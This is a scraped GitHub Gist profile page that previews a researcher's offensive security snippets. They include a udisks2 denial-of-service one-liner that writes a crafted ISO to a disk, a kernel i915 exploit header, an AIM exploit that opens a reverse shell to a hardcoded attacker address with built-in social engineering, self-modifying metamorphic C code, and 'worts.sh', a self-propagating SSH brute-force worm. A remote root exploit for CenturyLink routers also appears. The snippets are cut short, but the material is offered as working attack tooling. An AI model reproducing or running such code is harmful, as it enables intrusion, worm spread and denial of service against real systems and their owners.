Skip to content

Instantly share code, notes, and snippets.

😏
Laides, ladies. I'm only here for the 0days.

Marshall Whittaker oxagast

😏
Laides, ladies. I'm only here for the 0days.
Block or report user

Report or block oxagast

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View makeitrain.sh
#!/bin/bash
#
# ./makeitrain.sh bitcoin-qt.crashdump.core
# __ _ _ __ ___ __ ____ ____
# / ( \/ )/ _\ / __)/ _\/ ___(_ )
# ( O ) (/ ( (_ / \___ \ )(
# \__(_/\_\_/\_/\___\_/\_(____/(__)
#
# Donations:
# btc: 34fDhMUkvGVr1s2jQvhwmBfw1xqjstrLed
@oxagast
oxagast / autopreter.pl
Last active Aug 17, 2019
Automatically generate a custom metasploit.rc resource targeted at an address.
View autopreter.pl
#!/usr/bin/perl
use strict;
use Cwd qw();
my $path = Cwd::cwd();
if ($path !~ m/metasploit/) {
print ("err: Your current working directory must be metasploit's.\n");
exit(1);
}
print("autopreter by oxagast\n");
if($#ARGV < 1) {
View udisks2.8.0-DoS.sh
genisoimage -V "AAAAAAAA" -o dos.iso /etc/passwd && dd if=dos.iso | sed -e 's/AAAAAAAA/%n%n%n%n/g' | dd of=/dev/sdb1
View drm_i915_ktsploit.c
/* */
/* gcc drm_i915_ktsploit.c -o kt -ldrm -I/usr/include/libdrm */
/* exploit by oxagast */
/* */
//Jun 17 01:22:05 likon kernel: [ 1788.600973] BUG: unable to handle kernel NULL pointer dereference at 0000000000000010
//Jun 17 01:22:05 likon kernel: [ 1788.600982] IP: __sg_alloc_table_from_pages+0xe4/0x1f0
//Jun 17 01:22:05 likon kernel: [ 1788.600984] PGD 0 P4D 0
//Jun 17 01:22:05 likon kernel: [ 1788.600987] Oops: 0000 [#3] SMP PTI
//Jun 17 01:22:05 likon kernel: [ 1788.600988] Modules linked in: rfcomm appletalk ipx p8023 psnap p8022 llc pci_stub vboxpci(OE) vboxnetadp(OE) vboxnetflt(OE) vboxdrv(OE) snd_hrtimer ccm cmac bnep binfmt_misc arc4 iwlmvm mac80211 hid_multitouch hid_sensor_magn_3d hid_sensor_accel_3d hid_sensor_rotation hid_sensor_incl_3d hid_sensor_als ir_lirc_codec lirc_dev hid_sensor_gyro_3d rtl2832_sdr hid_sensor_trigger industrialio_t
View aim_8.0.1.5_reverse.sh
#!/bin/bash
### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.
### Leverages binary file planting to My Documents via AIMs advertisement code.
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.
### Marshall Whittaker
ATTACKER="192.168.2.10";
View myself.c
#define __NULLHOLDER
#define __START
/* oxagast */
/* self output metamorphic c code */
/* gcc myself.c -o me && cat myself.c >> me */
/* ./me && md5sum ./me && sleep 1 && ./me && md5sum ./me */
/* d4c6f41bace586e876f31d8d5032bd2e ./me */
/* 9c80c85a49721a1700e0ac2f594bbf86 ./me */
#include <stdio.h>
#include <stdlib.h>
View bermise_fuzz.sh
# bermise_fuzz
# oxagast
mupr="64";
syslog_crashes=$(grep "traps:\|segfault" /var/log/syslog -c);
binname="$1";
binshort=$(echo $binname | awk -F "/" '{print $NF}')
echo fuzzing $binname;
randchars=1;
@oxagast
oxagast / worts.sh
Created Nov 15, 2017
Bruteforce random SSH servers and propogate.
View worts.sh
#!/bin/bash
dnf install tor torsocks expect -y; apt-get install tor torsocks expect build-essential -y; systemctl start tor &
werm=$(cat $0 | base64 -w 0);
pound='8.8.8.8';
while [ 1 ];
do
ip_address=$(dd if=/dev/urandom bs=4 count=1 2>/dev/null | od -An -tu1 | sed -e 's/^ *//' -e 's/ */./g')
ping $pound -f -c 10000 &
wget $pound &
servers_addresses=( $ip_address )
@oxagast
oxagast / all_suid.sh
Created Oct 8, 2017
Find valid suid root executables on linux
View all_suid.sh
PKG=$(apt-cache search . | cut -f 1 -d ' ');
echo $PKG | xargs apt-get download;
DEB=(`find *.deb`);
for i in ${DEB[@]};
do dpkg -c $i | cut -c 4- | grep ^s | cut -f 2 -d '.' ; done | tee deb_suid_root.txt
@oxagast
oxagast / pk5001z00pin.c
Last active May 6, 2018
Remote root Exploit for PK5001Z CenturyLink Routers.
View pk5001z00pin.c
/* PK5001Z CenturyLink Router/Modem remote root exploit */
/* oxagast / Marshall Whittaker */
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin */
/* PK5001Z CenturyLink Router remote root 0day */
/* Enjoy! */
/* --oxagast */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1 */
/* */
/* # uname -a; id; */
You can’t perform that action at this time.